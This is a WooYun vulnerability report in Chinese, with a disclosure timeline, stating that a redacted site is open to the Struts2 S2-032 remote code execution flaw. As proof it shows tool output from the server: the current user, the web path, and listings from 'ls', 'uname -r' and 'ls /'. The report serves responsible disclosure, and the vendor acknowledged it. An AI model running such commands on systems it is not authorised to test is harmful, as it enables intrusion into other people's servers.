乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-19: 细节已通知厂商并且等待厂商处理中 2016-05-21: 厂商已经确认,细节仅向厂商公开 2016-05-31: 细节向核心白帽子及相关领域专家公开 2016-06-10: 细节向普通白帽子公开 2016-06-20: 细节向实习白帽子公开 2016-07-05: 细节向公众公开
.
漏洞站点:**.**.**.**/APHSQD/login.action
存在S2-032 struts2漏洞
Target: **.**.**.**/APHSQD/forgetPassword.actionUseage: S2-032 Whoami: phsqdmgrWebPath: /WEBAP/APSOURCE/APHSQD/JBOSS/DEFAULT/
cmd-> ls====================================================================================================================================classpath.shjboss_init_hpux.shjboss_init_redhat.shjboss_init_solaris.shjboss_init_suse.shprobe.batprobe.shrun.batrun.confrun.jarrun.shsecurity_cc.policyshutdown.batshutdown.jarshutdown.shshutdown-shortcut.batshutdown-shortcut.shstartAPHSQD.shstopAPHSQD.shtwiddle.battwiddle.jartwiddle.shvelocity.logvelocity.log.1wsconsume.batwsconsume.shwsprovide.batwsprovide.shwsrunclient.batwsrunclient.shwstools.batwstools.sh
cmd-> uname -r====================================================================================================================================2.6.18-164.11.1.el5xen
cmd-> ls /====================================================================================================================================APBPPAPCCEAPCDWSAPENGAPESRMAPFOSPAPHSAPAPHSQDAPIIPAPINAAPMAVNAPMSPAPNPBAPNPCAPPXCAPPXDAPPXFAPQTDAPSRMPFAPSYSL1binbootdevDUPNFSetcfilestorehomeliblib64lost+foundmediamiscmntnetNODUPFILEoptPBPPPCCEPCDWSPENGPESRMPFOSPPHSAPPHSQDPIIPPINAPMAVNPMSPPNPBPNPCPPXCPPXDPPXFPPXMPQTDprocPSRMPFrootsbinselinuxSOURCEsrvsystftpboottmpusrvarWEBAPWEBAPLOG
危害等级:高
漏洞Rank:18
确认时间:2016-05-21 01:37
感謝通報
暂无